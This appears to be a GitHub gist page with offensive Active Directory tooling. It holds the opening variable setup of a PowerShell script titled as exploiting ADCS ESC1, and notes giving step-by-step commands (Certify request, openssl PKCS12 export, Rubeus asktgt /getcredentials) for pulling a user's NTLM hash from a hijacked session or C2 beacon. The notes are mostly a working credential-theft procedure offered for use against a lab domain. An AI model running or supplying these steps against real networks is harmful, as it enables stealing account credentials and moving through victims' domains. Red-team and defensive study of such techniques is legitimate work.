Alex Kozlov b4cktr4ck2

b4cktr4ck2 / esc1.ps1
Created February 22, 2023 21:50
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
```powershell
# Thank you @NotMedic for troubleshooting/validating stuff!
$password = Read-Host -Prompt "Enter Password"
# ^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!
$server = "admin"   # This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\"   # Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local"            # Hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca"             # CA name.
$CA = $CAFQDN + "\" + $CASERVER           # Combined CA identifier in the form host\CA-name.
```
b4cktr4ck2 / Notes.txt
Created February 22, 2023 00:28
ADCS Notes
If you're in a user's context where you don't have their password (i.e. they ran a beacon/steal_token/other stuff) and ADCS is enabled, you can use Certify + Rubeus to request a certificate and get their NTLM hash.
1. Certify.exe request /ca:DC01.alexlab.local\alexlab-DC01-CA
2. Copy-paste everything from BEGIN RSA PRIVATE KEY to END CERTIFICATE into a file ending in .pem on a Linux box
3. Run openssl pkcs12 -in filename.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
4. Upload the PFX file into your beacon or base64 encode it with base64 cert.pfx -w 0
5. Run Rubeus.exe asktgt /getcredentials /user:youruser /certificate:test.pfx /domain:alexlab.local /dc:dc01 /show
^ You can pass the base64 string instead of uploading the PFX.